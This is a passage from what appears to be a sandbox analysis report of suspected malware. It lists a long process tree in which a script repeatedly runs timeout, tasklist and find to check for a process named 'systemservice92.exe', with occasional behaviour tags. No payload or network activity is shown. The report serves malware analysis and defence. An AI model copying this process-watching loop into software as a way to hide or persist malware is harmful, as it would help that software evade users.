      PID:9600
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2016
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:1172
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4124
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9744
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:2336
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:776
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9764
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:248
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9428
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2256
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9808
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9820
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9536
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:4924
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:3848
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:3704
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9520
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9452
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9448
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5056
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9524
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9644
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9776
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9940
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:3284
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9528
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5148
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9784
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:1964
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:1112
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:3612
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:3356
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9556
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:10044
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:3656
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5160
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2656
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:5920
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5904
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4824
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:10200
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:10144
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:3928
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6508
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:3576
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2716
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5708
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7144
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7152
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:2784
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:692
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:10148
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7172
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:1228
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5732
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:4836
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9756
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2952
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9476
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:10112
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:10180
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:5028
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:772
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:10220
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:1012
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:3560
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:3332
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9436
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5044
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9724
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:1308
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7520
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5192
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9680
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:10152
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:3492
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5152
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5868
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:10184
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:4168
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:2936
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9844
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:3112
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5136
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:832
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5292
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:560
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:1872
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:5320
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5328
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5700
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5364
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5400
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5408
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5456
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5436
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:3892
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:3136
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:1556
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4852
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:5540
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6588
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:3328
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:4540
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:572
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:5664
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5600
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5612
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5820
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:5836
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5952
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4408
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:2988
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5856
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4212
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:3800
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:2400
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4944
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:1148
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:420
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5508
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5824
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5492
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2544
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:2060
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4436
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:1796
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5524
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5488
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:1972
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:2592
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:2288
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:788
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:2992
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:2228
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:3584
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:1264
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:988
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2028
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6012
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6020
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6044
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6076
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6088
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6096
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:2916
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4784
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:552
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:2864
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:556
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6160
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5240
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5252
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6228
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6336
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6324
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6268
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6408
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6352
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6328
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:6452
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6460
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6432
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6568
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6632
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6608
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6636
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6728
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6832
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6612
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6740
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6640
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6996
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7012
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6864
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:292
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:300
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6792
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6580
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6736
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7196
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7312
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7284
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7396
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7392
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7468
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:7488
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7508
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7484
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7560
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7564
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:3900
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7644
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7712
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7724
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7648
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7636
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7836
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7796
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7600
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7580
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7768
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7756
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7744
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7884
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7960
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7964
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7688
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7920
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7992
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7984
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7996
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8048
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8080
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8084
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8124
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8152
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8156
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5740
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:124
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8208
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5764
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8328
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8260
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8320
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8436
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:8496
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8500
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6760
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8516
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6484
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8544
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8620
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8612
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8664
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8680
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7124
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7140
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7248
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7252
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6548
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8724
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8712
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8752
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8736
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8804
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8764
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8812
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8864
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8924
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8968
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8952
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8992
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9048
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7364
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7352
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9072
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9064
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:3488
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9160
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9152
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:9240
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:4776
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9220
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:3296
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9328
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9308
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2724
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9392
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9380
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:1832
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9396
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5204
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:3756
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5128
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:1040
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:1368
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:1236
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9532
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:412
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8640
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8560
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2016
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9736
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4584
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:9744
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9748
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8964
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9768
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:4528
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5176
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9468
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8100
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:1404
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9640
  - - C:\Windows\system32\tasklist.exe
